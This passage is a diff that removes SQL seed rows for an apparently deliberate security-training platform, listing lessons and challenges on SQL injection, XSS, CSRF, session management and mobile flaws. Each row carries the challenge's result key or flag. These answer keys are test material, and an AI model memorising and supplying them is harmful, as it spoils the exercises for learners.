-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('53a53a66cb3bf3e4c665c442425ca90e29536edd', 'Insecure Data Storage', 'insecure.data.storage', 'lesson',
-        'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'Battery777',
-        'ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f', 'open', '45', '25', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('201ae6f8c55ba3f3b5881806387fbf34b15c30c2', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage',
-        'lesson', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage',
-        'base64isNotEncryptionBase64isEncodingBase64HidesNothingFromYou',
-        'if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2', 'open', '46', '25', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('408610f220b4f71f7261207a17055acbffb8a747', 'SQL Injection', 'sql.injection', 'lesson', 'Injection',
-        'injection', '3c17f6bf34080979e0cebda5672e989c07ceec9fa4ee7b7c17c9e3ce26bc63e0',
-        'e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594', 'open', '55', '30', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('891a0208a95f1791287be721a4b851d4c584880a', 'Insecure Cryptographic Storage Challenge 1',
-        'insecure.cryptographic.storage.challenge.1', 'challenge', 'Insecure Cryptographic Storage',
-        'insecure.cryptographic.storage', 'mylovelyhorserunningthroughthefieldwhereareyougoingwithyourbiga',
-        'x9c408d23e75ec92495e0caf9a544edb2ee8f624249f3e920663edb733f15cd7', 'open', '65', '35', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4', 'Insecure Direct Object Reference Challenge 1',
-        'insecure.direct.object.reference.challenge.1', 'challenge', 'Insecure Direct Object References',
-        'insecure.direct.object.references', 'dd6301b38b5ad9c54b85d07c087aebec89df8b8c769d4da084a55663e6186742',
-        'o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c', 'open', '66', '35', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6be5de81223cc1b38b6e427cc44f8b6a28d2bc96', 'Poor Data Validation 1', 'poor.data.validation.1', 'challenge',
-        'Poor Data Validation', 'poor.data.validation',
-        'd30475881612685092e5ec469317dcc5ccc1f548a97bfdb041236b5bba7627bf',
-        'ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e', 'open', '67', '35', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('544aa22d3dd16a8232b093848a6523b0712b23da', 'SQL Injection 1', 'sql.injection.1', 'challenge', 'Injection',
-        'injection', 'fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f',
-        'e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a', 'open', '68', '35', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('2ab09c0c18470ae5f87d219d019a1f603e66f944', 'Reverse Engineering', 'reverse.engineering', 'lesson',
-        'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'DrumaDrumaDrumBoomBoom',
-        '19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9', 'open', '75', '40', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d', 'Session Management Challenge 1', 'session.management.challenge.1',
-        'challenge', 'Session Management', 'session.management', 'db7b1da5d7a43c7100a6f01bb0c',
-        'dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a', 'open', '75', '40', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('3d5b46abc6865ba09aaff98a8278a5f5e339abff', 'Failure to Restrict URL Access 1',
-        'failure.to.restrict.url.access.1', 'challenge', 'Failure to Restrict URL Access',
-        'failure.to.restrict.url.access', 'c776572b6a9d5b5c6e4aa672a4771213',
-        '4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99', 'open', '76', '40', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('1506f22cd73d14d8a73e0ee32006f35d4f234799', 'Unintended Data Leakage', 'unintended.data.leakage', 'lesson',
-        'Mobile Data Leakage', 'mobile.data.leakage', 'SilentButSteadyRedLed',
-        '392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec', 'open', '77', '40', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('453d22238401e0bf6f1ff5d45996407e98e45b07', 'Cross Site Request Forgery', 'cross.site.request.forgery',
-        'lesson', 'CSRF', 'csrf', '666980771c29857b8a84c686751ce7edaae3d6ac1',
-        'ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7', 'open', '78', '40', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('5b461ebe2e5e2797740cb3e9c7e3f93449a93e3a', 'Content Provider Leakage', 'content.provider.leakage', 'lesson',
-        'Mobile Content Provider', 'mobile.content.provider', 'LazerLizardsFlamingWizards',
-        '4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39', 'open', '79', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', 'Untrusted Input', 'untrusted.input', 'lesson',
-        'Mobile Security Decisions via Untrusted Input', 'mobile.security.decisions.via.untrusted.input',
-        'RetroMagicFuturePunch', '5e2b61c679d1f290d23308b3b66c3ec00cd069f1483b705d17f2795a4e77dcb6', 'open', '82', '50',
-        1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('52885a3db5b09adc24f38bc453fe348f850649b3', 'Reverse Engineering 1', 'reverse.engineering.1', 'challenge',
-        'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'christopherjenkins',
-        '072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295', 'open', '85', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('b6432a6b5022cb044e9946315c44ab262ab59e88', 'Unvalidated Redirects and Forwards',
-        'unvalidated.redirects.and.forwards', 'lesson', 'Unvalidated Redirects and Forwards',
-        'unvalidated.redirects.and.forwards', '658c43abcf81a61ca5234cfd7a2',
-        'f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f', 'open', '86', '45', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('335440fef02d19259254ed88293b62f31cccdd41', 'Client Side Injection', 'client.side.injection', 'lesson',
-        'Mobile Injection', 'mobile.injection', 'VolcanicEruptionsAbruptInterruptions',
-        'f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1', 'open', '87', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('f771a10efb42a79a9dba262fd2be2e44bf40b66d', 'SQL Injection 2', 'sql.injection.2', 'challenge', 'Injection',
-        'injection', 'f62abebf5658a6a44c5c9babc7865110c62f5ecd9d0a7052db48c4dbee0200e3',
-        'ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b', 'open', '88', '45', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('d7eaeaa1cc4f218abd86d14eefa183a0f8eb6298', 'NoSQL Injection One', 'nosql.injection.one', 'challenge',
-        'Injection', 'injection', 'c09f32d4c3dd5b75f04108e5ffc9226cd8840288a62bdaf9dc65828ab6eaf86a',
-        'd63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66', 'open', '89', '45', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0cdd1549e7c74084d7059ce748b93ef657b44457', 'Poor Authentication', 'poor.authentication', 'lesson',
-        'Mobile Poor Authentication', 'mobile.poor.authentication', 'UpsideDownPizzaDip',
-        '77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e', 'open', '90', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ef6496892b8e48ac2f349cdd7c8ecb889fc982af', 'Broken Crypto', 'broken.crypto', 'lesson', 'Mobile Broken Crypto',
-        'mobile.broken.crypto', '33edeb397d665ed7d1a580f3148d4b2f',
-        '911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212', 'open', '97', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('f16bf2ab1c1bf400d36330f91e9ac6045edcd003', 'Reverse Engineering 2', 'reverse.engineering.2', 'challenge',
-        'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'FireStoneElectric',
-        '5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1', 'open', '98', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('c685f8102ae0128c2ab342df64699bb8209a0839', 'SQL Injection Escaping', 'sql.injection.escaping', 'challenge',
-        'Injection', 'injection', '0dcf9078ba5d878f9e23809ac8f013d1a08fdc8f12c5036f1a4746dbe86c0aac',
-        '8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4', 'open', '99', '50', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('b70a84f159876bb9885b6e0087d22f0a52abbfcf', 'Session Management Challenge 2', 'session.management.challenge.2',
-        'challenge', 'Session Management', 'session.management', '4ba31e5ffe29de092fe1950422a',
-        'd779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7', 'open', '105', '55', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('20e755179a5840be5503d42bb3711716235005ea', 'CSRF 1', 'csrf.1', 'challenge', 'CSRF', 'csrf',
-        '7639c952a191d569a0c741843b599604c37e33f9f5d8eb07abf0254635320b07',
-        's74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52', 'open', '106', '55', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e', 'Session Management Challenge 3', 'session.management.challenge.3',
-        'challenge', 'Session Management', 'session.management', 'e62008dc47f5eb065229d48963',
-        't193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3', 'open', '115', '60', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('307f78f18fd6a87e50ed6705231a9f24cd582574', 'Insecure Data Storage 1', 'insecure.data.storage.1', 'challenge',
-        'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'WarshipsAndWrenches',
-        '362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01', 'open', '116', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('3f010a976bcbd6a37fba4a10e4a057acc80bdc09', 'Broken Crypto 1', 'broken.crypto.1', 'challenge',
-        'Mobile Broken Crypto', 'mobile.broken.crypto', 'd1f2df53084b970ab538457f5af34c8b',
-        'd2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717', 'open', '117', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('d4e2c37d8f1298fcaf4edcea7292cb76e9eab09b', 'Cross Site Scripting 2', 'cross.site.scripting.2', 'challenge',
-        'XSS', 'xss', '495ab8cc7fe9532c6a75d378de', 't227357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888',
-        'open', '119', '60', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('9e46e3c8bde42dc16b9131c0547eedbf265e8f16', 'Reverse Engineering 3', 'reverse.engineering.3', 'challenge',
-        'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'C1babd72225f0e9934YZ8',
-        'dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b', 'open', '120', '76', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0709410108f91314fb6f7721df9b891351eb2fcc', 'Insecure Cryptographic Storage Challenge 2',
-        'insecure.cryptographic.storage.challenge.2', 'challenge', 'Insecure Cryptographic Storage',
-        'insecure.cryptographic.storage', 'TheVigenereCipherIsAmethodOfEncryptingAlphabeticTextByUsingPoly',
-        'h8aa0fdc145fb8089661997214cc0e685e5f86a87f30c2ca641e1dde15b01177', 'open', '126', '65', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('82e8e9e2941a06852b90c97087309b067aeb2c4c', 'Insecure Direct Object Reference Challenge 2',
-        'insecure.direct.object.reference.challenge.2', 'challenge', 'Insecure Direct Object References',
-        'insecure.direct.object.references', '1f746b87a4e3628b90b1927de23f6077abdbbb64586d3ac9485625da21921a0f',
-        'vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4', 'open', '127', '65', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342', 'Cross Site Scripting 3', 'cross.site.scripting.3', 'challenge',
-        'XSS', 'xss', '6abaf491c9122db375533c04df', 'ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e',
-        'open', '128', '65', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('da3de2e556494a9c2fb7308a98454cf55f3a4911', 'Insecure Data Storage 2', 'insecure.data.storage.2', 'challenge',
-        'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'starfish123',
-        'ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4', 'open', '129', '65', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('cb7d696bdf88899e8077063d911fc8da14176702', 'Insecure Data Storage 3', 'insecure.data.storage.3', 'challenge',
-        'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'c4ptainBrunch',
-        '11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851', 'open', '130', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('de626470273c01388629e5a56ac6f17e2eef957b', 'Insecure Direct Object Reference Bank',
-        'insecure.direct.object.reference.bank', 'challenge', 'Insecure Direct Object References',
-        'insecure.direct.object.references', '4a1df02af317270f844b56edc0c29a09f3dd39faad3e2a23393606769b2dfa35',
-        '1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c', 'open', '131', '60', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('f40b0cd5d45327c9426675313f581cf70c7c7c28', 'Unintended Data Leakage 1', 'unintended.data.leakage.1',
-        'challenge', 'Mobile Data Leakage', 'mobile.data.leakage', 'BagsofSalsa',
-        '517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136', 'open', '132', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e', 'SQL Injection 3', 'sql.injection.3', 'challenge', 'Injection',
-        'injection', '9815 1547 3214 7569', 'b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6', 'open',
-        '135', '70', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('94cd2de560d89ef59fc450ecc647ff4d4a55c15d', 'CSRF 2', 'csrf.2', 'challenge', 'CSRF', 'csrf',
-        '45309dbaf8eaf6d1a5f1ecb1bf1b6be368a6542d3da35b9bf0224b88408dc001',
-        'z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e', 'open', '136', '70', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('5ca9115f3279b9b9f3308eb6a59a4fcd374846d6', 'CSRF 3', 'csrf.3', 'challenge', 'CSRF', 'csrf',
-        '6bdbe1901cbe2e2749f347efb9ec2be820cc9396db236970e384604d2d55b62a',
-        'z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c', 'open', '137', '70', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('a3f7ffd0f9c3d15564428d4df0b91bd927e4e5e4', 'Client Side Injection 1', 'client.side.injection.1', 'challenge',
-        'Mobile Injection', 'mobile.injection', 'SourHatsAndAngryCats',
-        '8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef', 'open', '138', '70', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('cfbf7b915ee56508ad46ab79878f37fd9afe0d27', 'CSRF 4', 'csrf.4', 'challenge', 'CSRF', 'csrf',
-        'bb78f73c7efefec25e518c3a91d50d789b689c4515b453b6140a2e4e1823d203',
-        '84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5', 'open', '139', '70', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('1e3c02ad49fa9a9e396a3b268d7da8f0b647d8f9', 'Unintended Data Leakage 2', 'unintended.data.leakage.2',
-        'challenge', 'Mobile Data Leakage', 'mobile.data.leakage', '627884736748',
-        '85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7', 'open', '140', '70', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('fcc1918e0a23b8420e173cf8029876cb887408d3', 'CSRF JSON', 'csrf.json', 'challenge', 'CSRF', 'csrf',
-        'f57f1377bd847a370d42e1410bfe48c9a3484e78d50e83f851b634fe77d41a6e',
-        '2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb', 'open', '141', '70', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ced925f8357a17cfe3225c6236df0f681b2447c4', 'Session Management Challenge 4', 'session.management.challenge.4',
-        'challenge', 'Session Management', 'session.management', '238a43b12dde07f39d14599a780ae90f87a23e',
-        'ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6', 'open', '145', '75', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('182f519ef2add981c77a584380f41875edc65a56', 'Cross Site Scripting 4', 'cross.site.scripting.4', 'challenge',
-        'XSS', 'xss', '515e05137e023dd7828adc03f639c8b13752fbdffab2353ccec',
-        '06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751', 'open', '146', '75', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998', 'SQL Injection 4', 'sql.injection.4', 'challenge', 'Injection',
-        'injection', 'd316e80045d50bdf8ed49d48f130b4acf4a878c82faef34daff8eb1b98763b6f',
-        '1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629', 'open', '147', '75', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
